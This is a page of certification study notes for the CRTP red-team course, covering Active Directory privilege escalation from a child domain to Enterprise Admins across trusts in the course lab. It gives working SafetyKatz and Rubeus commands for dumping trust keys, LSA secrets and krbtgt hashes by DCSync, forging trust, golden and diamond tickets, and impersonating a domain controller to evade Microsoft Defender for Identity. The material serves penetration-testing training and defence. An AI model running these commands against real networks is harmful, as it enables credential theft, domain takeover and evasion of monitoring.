Certified Red Team Professional (CRTP) - Notes
HomeGitHubPortfolioTwitter/XMediumCont@ct
  • 📝Certified Red Team Professional (CRTP) - Notes
    • ℹ️0 - Course Summary
    • 1️⃣1 - Active Directory (AD)
      • 1.1 - Introduction to Active Directory (AD)
      • 1.2 - Physical Components of AD
      • 1.3 - Logical Components of AD
    • 2️⃣2 - PowerShell
      • 2.1 - Introduction to PowerShell
      • 2.2 - Security and Detection
    • 3️⃣3 - AD Enumeration
      • 3.1 - Host & User Identification
      • 3.2 - Common Services Enum
        • 3.2.1 - LDAP & DNS Enum
        • 3.2.2 - SMB Enum & Common Attacks
      • 3.3 - Domain Enumeration
        • 3.3.1 - PowerView
          • 3.3.1.1 - Domain Enumeration (Video Lab)
        • 3.3.2 - BloodHound
    • 4️⃣4 - Trust and Privileges Mapping
      • 4.1 - Access Control (ACL/ACE)
      • 4.2 - Group Policy
      • 4.3 - Trusts
    • 5️⃣5 - Local Privilege Escalation
      • 5.1 - Privilege Escalation
        • 5.1.1 - Feature Abuse
        • 5.1.2 - Relaying
        • 5.1.3 - GPO Abuse
        • 5.1.4 - Unquoted Service Path
      • 5.2 - Tools
    • 7️⃣6 - Lateral Movement
      • 6.1 - PowerShell Remoting & Tradecraft
      • 6.2 - Credentials Extraction & Mimikatz
    • 9️⃣7 - Kerberos Attack and Privelege Escalation
      • 7.1 - Kerberos Intro
      • 7.2 - User Enum in Kerberos
      • 7.3 - AS-REP Roasting
      • 7.4 - Kerberoasting
      • 7.5 - Kerberos Delegation
        • Uncostrained Delegation
        • Constrained Delegation
      • 7.6 - Accross Trusts
        • Page
        • External Trust
        • Forest
        • Domain Trust
    • 8️⃣8 - Persistence
      • 8.1 - Golden Ticket
      • 8.2 - Silver Ticket
      • 8.3 - Diamond Ticket
      • 8.4 - Skeleton Key
      • 8.5 - DSRM
      • 8.6 - Custom SSP
      • 8.7 - Persistence via ACLs
        • 8.7.1 - AdminSDHolder
        • 8.7.2 - DCSync Attack
        • 8.7.3 - Security Descriptors
    • 9️⃣9 - Detection and Defense
    • Lab
      • 0 - Lab Instructions
      • 1 - LO 1️
      • 2 - LO2️
      • 3 - LO 3️
      • 4 - LO 4️
      • 5 - LO 5️
      • 6 - LO 6️
      • 7 - LO 7️
      • 8 - LO8️
      • 9 - LO9️
      • 10 - LO1️0️
      • 11 - LO1️1️
      • 12 - LO1️2️
      • 13 - LO1️3️
      • 14 - LO1️4️
      • 15 - LO1️5️
      • 16 - LO1️6️
      • 17 - LO1️7️
      • 18 - LO1️8️
      • 19 - LO1️9️
      • 20 - LO2️0️
      • 21 - LO2️1️
      • 22 - LO 2️2️
      • 23 - LO2️3️
    • 📄Report
      • How to write a PT Report
  • 🛣️RoadMap / Exam Preparation
  • 📔CRTP Cheat Sheet
Powered by GitBook
On this page
  • Privilege Escalation Across Trusts
  • Escalating Privileges to Enterprise Admins
  1. Certified Red Team Professional (CRTP) - Notes
  2. 7 - Kerberos Attack and Privelege Escalation

7.6 - Accross Trusts

Privilege Escalation Across Trusts

Trusts Between Domains and Forests

In Active Directory environments, trust relationships determine how authentication requests are handled across domain or forest boundaries.

  • Inter-Domain Trusts (Same Forest): By default, domains within the same forest have an implicit, bidirectional trust. This allows users in one domain to access resources in another, subject to appropriate permissions.

  • Inter-Forest Trusts: Trust relationships between separate forests must be explicitly created. These trusts can be one-way or two-way and are necessary for cross-forest authentication and resource access.


Escalating Privileges to Enterprise Admins

Using sIDHistory for Privilege Escalation

The sIDHistory attribute stores previous SIDs for a user account, typically used during domain migrations to preserve access rights. This mechanism can be abused to escalate privileges across domains or forests by injecting the SID of a high-privilege group (e.g., Enterprise Admins).

There are two main methods for exploiting this:

  1. Using the krbtgt Hash from the Child Domain

  2. Forging Trust Tickets (Inter-Realm TGTs)


Method 1: Forging Trust Tickets

To forge inter-realm TGTs (trust tickets), the attacker needs access to the inter-domain trust key (the shared secret used between the child and parent domains).

Retrieving the Trust Key

The trust key can be obtained from the child domain controller using:

SafetyKatz.exe "lsadump::trust /patch"

Alternatively, it can be retrieved using DCSync or LSA secrets:

SafetyKatz.exe "lsadump::dcsync /user:dcorp\mcorp$"
SafetyKatz.exe "lsadump::lsa /patch"

Forging the Ticket with Rubeus

Rubeus.exe silver
/service:krbtgt/DOLLARCORP.MONEYCORP.LOCAL
/rc4:<trust_key_ntlm_hash>
/sid:<child_domain_sid>
/sids:<enterprise_admins_sid_from_parent>
/user:Administrator
/ldap
/nowrap

Then, use the forged TGT to request service tickets:

Rubeus.exe asktgs
/service:http/mcorp-dc.MONEYCORP.LOCAL
/dc:mcorp-dc.MONEYCORP.LOCAL
/ptt
/ticket:<FORGED_TGT>

Rubeus Silver Ticket Options (Summary)

  • /rc4: NTLM hash of the trust key

  • /sid: SID of the child domain

  • /sids: SID of the Enterprise Admins group (from the parent domain)

  • /user: Username to impersonate

  • /ldap: Pull PAC data via LDAP

  • /nowrap: Output formatting option


Method 2: Forging Golden Tickets with krbtgt Hash

This method is simpler and does not require trust ticket generation. Instead, it uses the krbtgt hash of the child domain to forge a normal Golden Ticket and adds the SID of the Enterprise Admins group from the parent domain to the sIDHistory.

Example (using SafetyKatz)

SafetyKatz.exe "kerberos::golden /user:Administrator
/domain:dollarcorp.moneycorp.local
/sid:<child_domain_sid>
/sids:<enterprise_admins_sid>
/krbtgt:<krbtgt_hash> /ptt" "exit"

This works because the parent domain trusts the child’s tickets due to the established trust relationship.


Bypassing Detection (MDI, Logging)

To evade suspicious logs and Microsoft Defender for Identity (MDI), impersonate a domain controller:

SafetyKatz.exe "kerberos::golden
/user:dcorp-dc$ /id:1000
/domain:dollarcorp.moneycorp.local
/sid:<child_domain_sid>
/sids:<enterprise_admins_sid>,S-1-5-9
/krbtgt:<krbtgt_hash> /ptt" "exit"

Use DCSync to extract the parent domain’s krbtgt hash:

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Relevant SIDs:

  • S-1-5-21-...-516: Domain Controllers group

  • S-1-5-9: Enterprise Domain Controllers group


Using Rubeus for Golden Ticket Forgery

Rubeus.exe golden
/aes256:<krbtgt_aes256_key>
/user:dcorp-dc$ /id:1000
/domain:dollarcorp.moneycorp.local
/sid:<child_domain_sid>
/sids:<enterprise_admins_sid>,S-1-5-9
/dc:DCORP-DC.dollarcorp.moneycorp.local
/ptt

Using Rubeus Diamond Ticket to Bypass MDI

Diamond tickets are specially crafted Golden Tickets designed to evade detection mechanisms.

Rubeus.exe diamond
/krbkey:<krbtgt_aes256_key>
/tgtdeleg /enctype:aes
/ticketuser:dcorp-dc$ /ticketuserid:1000
/domain:dollarcorp.moneycorp.local
/dc:dcorp-dc.dollarcorp.moneycorp.local
/sids:<enterprise_admins_sid>,S-1-5-9
/createnetonly:C:\Windows\System32\cmd.exe
/show /ptt

Use DCSync to extract the parent krbtgt hash if not already done:

SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
PreviousConstrained DelegationNextPage

Last updated 3 days ago

📝
9️⃣